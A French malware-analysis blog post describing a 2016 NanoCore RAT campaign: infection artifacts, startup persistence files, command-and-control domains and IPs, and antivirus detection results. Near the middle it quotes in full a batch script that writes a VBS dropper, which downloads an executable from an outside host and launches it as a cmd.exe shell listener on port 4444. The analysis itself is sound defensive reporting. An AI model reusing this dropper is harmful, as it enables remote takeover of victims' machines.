Trojan NanoCore / Backdoor:MSIL/Noancooe : Exemple d’une Campagne

Hier et quelques jours auparavant, des sujets similaires pour une campagne du RAT (Remote Access Tool) NanoCore
NanoCore est donc un malware de type Backdoor qui permet le contrôle à distance de l’ordinateur et faire à peu près tout : contrôler la souris, effectuer des captures d’écran, activer la Webcam et probablement offrant des fonctionnalités de keylogger.

nanocore-rat

Les topics liés à la campagne observée :

Dans, les deux cas, les internautes se plaignent d’erreur 2>NUL au démarrage de la session Windows.

Nanocore_erreur_demarrage_session_2Null

Hidedrop_erreur_null

Dans les cas observés, les éléments malicieux :

CAS 1 et 2 avec le HideDrop.exe :

Startup: C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdate.hta [2016-02-03] ()
Startup: C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Thug.bat [2016-02-03] ()
2016-02-13 01:13 - 2016-02-13 01:53 - 01457692 _____ C:\Users\Public\HideDrop.exe
2016-02-13 01:13 - 2016-02-13 01:40 - 00000000 ____D C:\Users\Robin\AppData\Roaming\AD8CCADA-1488-4B87-BD90-7BDE48CBF58E
2016-02-13 01:13 - 2016-02-13 01:13 - 00937776 ___SH (AutoIt Team) C:\Users\Robin\AppData\Roaming\fbQJYbBUHWXaOGZGZd1.exe
2016-02-10 07:03 - 2016-02-10 07:03 - 00133136 ___SH C:\Users\Robin\AppData\Roaming\eJLPgUPSSXbdcISPN
2016-02-10 07:03 - 2016-02-10 07:03 - 00061322 ___SH C:\Users\Robin\AppData\Roaming\IQXXgbHVHSQIORgGPaP.au3
2016-02-03 20:25 - 2016-02-13 01:53 - 00430487 _____ C:\Users\Public\test.vbs
2016-02-03 20:25 - 2016-02-13 01:53 - 00000361 _____ C:\Users\Public\kill.vbs

Cas 3 avec EasyCom.exe :

Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdate.hta [2016-02-13] () 
 Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Thug.bat [2016-02-13] ()  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00430527 _____ C:\Users\Public\test.vbs  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00000361 _____ C:\Users\Public\kill.vbs  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00000000 _____ C:\Users\Public\EasyComm.exe  
  2012-12-04 22:15 - 2015-03-09 07:52 - 0000340 _____ () C:\Users\Papa\AppData\Local\HackLogs.dat  
 2015-01-13 00:40 - 2015-01-13 00:40 - 0000001 _____ () C:\Users\Papa\AppData\Local\llftool.4.40.agreement 
 2012-12-04 22:14 - 2015-03-09 08:18 - 0000700 ___SH () C:\Users\Papa\AppData\Local\systemFL7.dat  
 2015-03-09 08:21 - 2015-03-09 08:22 - 0001906 ___SH () C:\Users\Papa\AppData\Local\win_fldb_sys.dat  
 2012-12-04 22:16 - 2015-03-09 07:55 - 0000000 ___SH () C:\Users\Papa\AppData\Local\win_lockerdb_sys.dat  
 2012-12-04 22:13 - 2015-03-09 08:23 - 0003465 ___SH () C:\Users\Papa\AppData\Local\win_stlthdb_sys.dat  
  2012-12-04 22:15 - 2012-12-04 22:15 - 0002568 ___SH () C:\ProgramData\win_mpwd_sys.dat  
C:\ProgramData\win_mpwd_sys.dat

Dans les deux cas, on retrouve les mêmes noms de fichiers Thug.bat et ChromeUpdate.hta se positionnant dans Startup afin de se lancer au démarrage de la session. Ce dernier télécharge et exécuté à chaque fois un binaire.
ChromeUpdate.hta du premier cas, utilisant PowerShell pour télécharger et installer le binaire HideDrop.exe :

NanoCore_Powershell_HTTP
Dans tous les cas, une connexion à une IP Ukrainienne Deltahost :

NanoCore_connexion_Ukraine_2 NanoCore_connexion_Ukraine

Cette campagne utilise des DNS fagdns.com :

microsecurhostx2.fagdns.com has address 176.107.176.60
176.107.176.60 – 60-176-107-176.deltahost.com.ua.

koerlnbiz.fagdns.com
91.229.79.229 – 229-79-229-91.deltahost.com.ua.

NanoCore_AutoIT_fagdns

On retrouve aussi l’utilisation du binaire AutoIT.exe pour charger un code source de Backdoor AutoIT.
Au départ, dans le premier cas, les détections antivirus étaient assez mauvaises puis se sont améliorés, le second cas, les détections sont bien meilleurs.

SHA256:d313d186508c73af3e2d0920306c3cbfb5a2355b8986f53eb4397e200f3c5e65
Nom du fichier :EasyComm.exe
Ratio de détection :31 / 54
Date d’analyse :2016-02-16 06:18:59 UTC (il y a 7 minutes)
AntivirusRésultatMise à jour
ALYacAIT:Trojan.Autoit.CRC20160216
AVGAutoit2_c.DLX20160216
Ad-AwareAIT:Trojan.Autoit.CRC20160216
AegisLabAit.Troj.Autoit!c20160216
ArcabitAIT:Trojan.Autoit.CRC20160216
AvastWin32:Malware-gen20160216
AviraDR/Autoit.A.1925420160216
BitDefenderAIT:Trojan.Autoit.CRC20160216
ComodoUnclassifiedMalware20160216
CyrenW32/GenBl.E491B7F8!Olympus20160216
DrWebTrojan.Packed.6165520160216
ESET-NOD32a variant of Win32/Injector.Autoit.CBV20160216
EmsisoftAIT:Trojan.Autoit.CRC (B)20160216
F-SecureAIT:Trojan.Autoit.CRC20160216
FortinetW32/Autoit.CRC!tr20160216
GDataAIT:Trojan.Autoit.CRC20160216
IkarusTrojan.Win32.Injector20160216
K7AntiVirusTrojan ( 004ddc351 )20160215
K7GWTrojan ( 004ddc351 )20160216
MalwarebytesTrojan.Injector.AutoIt20160216
McAfeeArtemis!E491B7F87A4420160216
McAfee-GW-EditionBehavesLike.Win32.Downloader.tc20160216
MicroWorld-eScanAIT:Trojan.Autoit.CRC20160216
MicrosoftBackdoor:MSIL/Noancooe.C20160216
NANO-AntivirusTrojan.Script.Agent.dzyotx20160216
PandaTrj/CI.A20160215
Qihoo-360HEUR/QVM10.1.Malware.Gen20160216
SophosMal/Generic-S20160216
TrendMicroTROJ_GEN.R01TC0DBF1620160216
VIPRETrojan.Win32.Generic!BT20160216
nProtectAIT:Trojan.Autoit.CRC20160215

Cheval de troie : Autoit2_c.DLX chez AVG :

AVG_Cheval_Troie_Autoit2_c

et Backdoor:MSIL/Noancooe.C chez Microsoft :Backdoor_MSIL_Naancooe

Sur le premier cas, je n’avais pas tilté, mais le second cas télécharge le binaire sur demo ovh :

1424262978.146 1583 192.168.1.101 TCP_MISS/200 1462039 GET http://demo.ovh.eu/download/efd0b3b86f5172334ee4347fdb4643c8/EasyComm.exe - DIRECT/188.165.12.227 application/octet-stream

Je me suis alors souvenu d’un sujet plus ou moins similaire : Infection cheval de troie (TeamSpeak)

il s’agissait d’une infection tirant partie d’une vulnérabilité sur TeamSpeak qui téléchargé et installé des scripts VBS et un binaire téléchargé sur Demo OVH.

echo 2> %public%\test.vbs
@echo off
@echo dim rgkzher > %public%\test.vbs
@echo dim dlmihjz >> %public%\test.vbs
@echo dim mlifgjs >> %public%\test.vbs
@echo set rgkzher = CreateObject("Microsoft.XMLHTTP") >> %public%\test.vbs
@echo set dlmihjz = CreateObject("ADODB.Stream") >> %public%\test.vbs
@echo set mlifgjs = CreateObject("WScript.Shell") >> %public%\test.vbs
@echo jkhzbeeh = "http://demo.ovh.eu/download/2aede7152ddbe275332d3bef7b68c469/Setup.exe" >> %public%\test.vbs
@echo vsahxga = "%public%\Setup.exe" >> %public%\test.vbs
@echo pouaregq = "%public%\Setup.exe -L -p 4444 -e cmd.exe" >> %public%\test.vbs
@echo rgkzher.open "GET", jkhzbeeh, False >> %public%\test.vbs
@echo rgkzher.send >> %public%\test.vbs
@echo dlmihjz.type = 1 >> %public%\test.vbs
@echo dlmihjz.open >> %public%\test.vbs
@echo dlmihjz.write rgkzher.responseBody >> %public%\test.vbs
@echo dlmihjz.savetofile vsahxga, 2 >> %public%\test.vbs
@echo mlifgjs.run pouaregq >> %public%\test.vbs

start %public%\test.vbs

Encore DeltaHost :
NanoCore_AutoIT_ftp_demo_ovh_2et on retrouve Thug.bat et Chrome.bat ainsi que Demo OVH.

NanoCore_AutoIT_ftp_demo_ovh

Bref, probablement le même groupe derrière ces campagnes.
Je n’ai pas la méthode de propagation des derniers cas, bien entendu, si j’ai des nouvelles, je viendrai éditer le topic.

A suivre !

EDIT – de retour avec DragonUp.exe

Recroisé sur commentcamarche.net : http://www.commentcamarche.net/forum/affich-33346551-dragonup-exe-trojan-nanocore
Le code est identique aux versions précédentes.

Trojan_nanocore_DragonUp_exe

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 256 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *